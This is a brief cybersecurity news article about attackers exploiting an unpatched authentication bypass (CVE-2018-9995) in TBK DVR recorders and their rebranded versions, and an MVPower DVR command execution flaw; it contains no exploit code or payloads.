HQ/EMEAFind out how we can help your business
Researchers discovered an unpatched authentication bypass vulnerability in the TBK DVR video recording devices. Threat actors have allegedly exploited the bug to steal sensitive footage from corporate networks that use the flawed device.
A recent surge of threat actors has also leveraged the available PoC exploit to target exposed servers.
TBK’s website claims that its products operate in different organisations from different sectors, such as retail, banking, and government. The researchers stated that the flaw is CVE-2018-9995, a critical authentication bypass bug that could allow remote attackers to acquire initial access to a compromised network.
The vulnerability has a severity score of 9.8 out of 10, which rises due to an error the camera suffers when the threat actors add a specially crafted HTTP cookie. In addition, a remote attacker could also abuse the flaw to avoid authentication prompts and acquire admin-level privileges that result in accessing camera video feeds.
Numerous threat actors are flocking over flawed TBK DVR devices to execute cybercriminal attacks.
Researchers recently identified over 50,000 attack attempts against TBK DVR devices with unique IPS detections for the past months. A recent tally confirmed that the vulnerability impacts the TBK version DVR4216 and DVR4104 product lines. These products have also undergone rebranding and are now available under the names QSee, Pulnix, Night OWL, DVR Login, CeNova, XVR 5 in 1, MDVR Login, Securus, HVR Login, and Novo.
A separate researcher has also noticed increased attack attempts against MVPower CCTV DVR models aside from TBK DVR. Threat actors have also leveraged a remote code execution flaw in MVPower models to run unauthenticated command execution via compromised HTTP requests. Attackers are still exploiting the vulnerability despite its age, about six years after its discovery.
Thousands of vulnerable DVR devices of different brands are facing exploitation from threat actors that leverage publicly available PoC codes. However, device manufacturers have not addressed these vulnerabilities, leaving all owners susceptible to attacks.
Cybersecurity researchers should replace these flawed surveillance systems with a more secure model to prevent attacks from malicious threat groups.
